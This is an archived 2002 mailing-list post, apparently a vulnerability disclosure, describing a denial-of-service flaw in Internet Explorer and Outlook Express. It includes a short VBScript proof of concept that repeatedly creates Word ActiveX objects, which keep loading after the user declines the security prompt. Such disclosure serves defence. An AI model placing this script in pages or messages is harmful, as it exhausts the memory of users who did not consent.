IE Word ActiveX DoS Loop

From: eflorioat_private
Date: Mon Apr 08 2002 - 12:40:17 PDT

  • Next message: bugzillaat_private: "[RHSA-2001:089-08] Updated tcpdump packages available for Red Hat Linux 6.2 and 7.x"

    
     ('binary' encoding is not supported, stored as-is)
    There is a flaw in ActiveX object creation
    used in VBscript for Word object; this can
    be used as Denial of Service.
    
    Try to use this code (remove "_" before using it) :
    
    ;<_SCRIPT LANGUAGE="VbScript">
    ;On Error Resume Next
    ;Dim a
    ;Dim i
    ;for i=1 to 100
    ;Set a = CreateObject("Word.Application")
    ;Next
    ;<_/SCRIPT>
    
    This script will activate the security warning about
    creation of an ActiveX object, but when someone 
    click on "NO" and deny execution
    of the script, the script is stopped, but
    the creation Word object in memory still
    continues. This sample script creates 100 Word 
    object in memory.....it's a real DoS!
    (try CTRL+ALT+CANC to see them)
    
    Works for IE/Outlook Express and Word2000/XP
    objects. Other office components (excel, powerpoint,
    access, etc.) maybe not affected.
    
    Elia Florio
    



    This archive was generated by hypermail 2b30 : Tue Apr 09 2002 - 13:14:16 PDT